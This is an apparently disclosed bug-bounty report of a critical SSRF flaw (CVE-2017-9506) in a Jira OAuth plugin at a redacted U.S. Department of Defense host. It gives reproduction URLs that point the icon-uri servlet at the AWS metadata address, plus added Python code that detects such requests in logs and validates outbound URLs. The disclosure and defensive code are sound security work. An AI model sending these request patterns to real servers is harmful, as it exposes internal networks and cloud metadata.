SSRF on █████████ Allowing internal server data access
Critical
U.S. Dept Of Defense
Reported by
alyssa_herrera
Vulnerability Details
Technical details and impact analysis
**Summary:**
An endpoint on ██████ allows internal access to the network, revealing sensitive data and allowing internal tunneling.
**Description:**
The OAuth plugin allows you to provide a URL that gives a snapshot of the web page. We can pass internal URLs and conduct SSRF.
## Impact
Critical
## Step-by-step Reproduction Instructions
https://███████/plugins/servlet/oauth/users/icon-uri?consumerUri=http://169.254.169.254/latest/meta-data/hostname
We can see the following data:
ip-172-31-12-254.█████████.compute.internal
https://████████/plugins/servlet/oauth/users/icon-uri?consumerUri=http://169.254.169.254/latest/meta-data/public-ipv4
███████
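The request pattern above is what a defender would look for in Jira access logs: a hit on the icon-uri servlet whose `consumerUri` parameter carries a link-local, private or loopback destination. The following detection is an added example, not part of the report or of any Atlassian code; the combined-format log lines are constructed for illustration, and the assumption that the servlet path and parameter name appear verbatim in the logged request target is mine.

```python
"""Flag icon-uri servlet requests whose consumerUri targets an internal address.

Added detection example; the log lines are constructed, not taken from a real system.
"""
import ipaddress
import re
from urllib.parse import parse_qs, urlsplit

# Constructed access-log lines (combined log format assumed).
SAMPLE_LOG = """\
203.0.113.7 - - [10/Jan/2018:12:00:01 +0000] "GET /plugins/servlet/oauth/users/icon-uri?consumerUri=http://169.254.169.254/latest/meta-data/hostname HTTP/1.1" 200 44
203.0.113.7 - - [10/Jan/2018:12:00:05 +0000] "GET /plugins/servlet/oauth/users/icon-uri?consumerUri=http%3A%2F%2F10.0.0.5%3A8080%2Fadmin HTTP/1.1" 200 512
198.51.100.9 - - [10/Jan/2018:12:01:10 +0000] "GET /plugins/servlet/oauth/users/icon-uri?consumerUri=https://example.com/icon.png HTTP/1.1" 200 1024
198.51.100.9 - - [10/Jan/2018:12:01:12 +0000] "GET /browse/PROJ-1 HTTP/1.1" 200 9000
203.0.113.7 - - [10/Jan/2018:12:02:00 +0000] "GET /plugins/servlet/oauth/users/icon-uri?consumerUri=http://localhost:8080/rest/api HTTP/1.1" 200 300
"""

# Source IP, timestamp, method, request target and status from a combined-format line.
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
ICON_URI_PATH = "/plugins/servlet/oauth/users/icon-uri"  # servlet path from the report
# Hostnames that should never be a legitimate icon source (assumed list).
INTERNAL_HOSTNAMES = {"localhost", "metadata", "metadata.google.internal"}


def is_internal_host(host):
    """True if host is an IP literal outside the public ranges or a well-known internal name."""
    if host is None:
        return False
    host = host.strip("[]").lower()
    if host in INTERNAL_HOSTNAMES or host.endswith(".internal"):
        return True
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return False  # a DNS name: cannot judge from the log alone
    # Covers loopback, link-local (169.254.0.0/16), RFC 1918 and other non-global ranges.
    return not ip.is_global


def consumer_uri_target(target):
    """Return the decoded consumerUri value for an icon-uri request, else None."""
    parts = urlsplit(target)
    if parts.path != ICON_URI_PATH:
        return None
    values = parse_qs(parts.query).get("consumerUri")  # parse_qs percent-decodes the value
    return values[0] if values else None


def find_internal_ssrf(log_text):
    """Return one record per icon-uri request aimed at an internal destination."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        uri = consumer_uri_target(m.group("target"))
        if uri is None:
            continue
        host = urlsplit(uri).hostname
        if is_internal_host(host):
            hits.append({"src": m.group("src"), "ts": m.group("ts"),
                         "consumer_uri": uri, "host": host})
    return hits


if __name__ == "__main__":
    for hit in find_internal_ssrf(SAMPLE_LOG):
        print(f"{hit['ts']} {hit['src']} -> {hit['host']} ({hit['consumer_uri']})")
```

On the constructed sample this flags the two metadata/private-address requests and the `localhost` one and ignores the public icon fetch. The check only judges IP literals and a short name list; a DNS name that resolves to an internal address is invisible to a log-only rule, which is one reason the remediation below matters more than detection.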
## Product, Version, and Configuration (If applicable)
Jira
## Suggested Mitigation/Remediation Actions
Update to a recent version.
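Updating removes the vulnerable servlet behaviour; the same class of bug is avoided in any server-side URL-fetching feature by validating where the request will actually go before connecting. The guard below is an added example of that check and is not Atlassian's fix or the patched plugin's code. It resolves the hostname itself (the resolver is injectable so the check runs offline), rejects any destination that maps to a non-public address, including IPv4-mapped IPv6 forms, and returns the resolved address so the caller can connect to exactly that IP rather than resolving again.

```python
"""Outbound-URL guard for a server-side fetch such as an icon snapshot.

Added example, not the plugin's own code. The resolver argument is an assumption
so the check can be exercised without network access.
"""
import ipaddress
import socket
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}


def default_resolver(host):
    """Resolve host to its IP addresses with the system resolver."""
    return sorted({info[4][0] for info in socket.getaddrinfo(host, None)})


def _effective_ip(addr):
    """Unwrap IPv4-mapped IPv6 (::ffff:a.b.c.d) so range checks apply to the real IPv4."""
    ip = ipaddress.ip_address(addr)
    if ip.version == 6 and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped
    return ip


def check_outbound_url(url, resolver=default_resolver):
    """Return (ok, reason, pinned_ip).

    pinned_ip is the address the caller must connect to; resolving again at
    connect time would reopen the DNS-rebinding window.
    """
    parts = urlsplit(url)
    if parts.scheme not in ALLOWED_SCHEMES:
        return False, f"scheme {parts.scheme!r} not allowed", None
    host = parts.hostname
    if not host:
        return False, "no host in URL", None
    if parts.username or parts.password:
        return False, "credentials in URL", None

    # IP literal: no lookup needed. Otherwise resolve every address the name maps to.
    try:
        addrs = [str(ipaddress.ip_address(host.strip("[]")))]
    except ValueError:
        try:
            addrs = resolver(host)
        except OSError as exc:
            return False, f"resolution failed: {exc}", None
    if not addrs:
        return False, "name resolved to no addresses", None

    # Every candidate must be public; one internal answer is enough to refuse.
    for addr in addrs:
        ip = _effective_ip(addr)
        if not ip.is_global or ip.is_multicast or ip.is_unspecified:
            return False, f"{host} resolves to non-public address {addr}", None
    return True, "ok", addrs[0]


if __name__ == "__main__":
    for candidate in ("http://169.254.169.254/latest/meta-data/hostname",
                      "http://[::ffff:169.254.169.254]/",
                      "file:///etc/hosts"):
        print(candidate, check_outbound_url(candidate))
```

Two details decide whether this guard holds in practice: the HTTP client must connect to `pinned_ip` (setting the `Host` header to the original name) rather than re-resolving, and any redirect the fetched server returns must pass through `check_outbound_url` again before it is followed, since a public host can otherwise redirect the fetcher to the metadata address.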
## Impact
An attacker can tunnel into internal networks and access sensitive internal data such as AWS metadata information.
The hacker selected the **Server-Side Request Forgery (SSRF)** weakness. This vulnerability type requires contextual information from the hacker. They provided the following answers:
**Can internal services be reached bypassing network access control?**
Yes
**What internal services were accessible?**
AWS Bucket Metadata
**Security Impact**
CVE-2017-9506 - The IconUriServlet of the Atlassian OAuth Plugin from version 1.3.0 before version 1.9.12 and from version 2.0.0 before version 2.0.4 allows remote attackers to access the content of internal network resources and/or perform an XSS attack via Server Side Request Forgery (SSRF).
Related CVEs
Associated Common Vulnerabilities and Exposures
CVE-2017-9506
Report Details
Additional information and metadata
State: Closed
Substate: Resolved
Weakness: Information Disclosure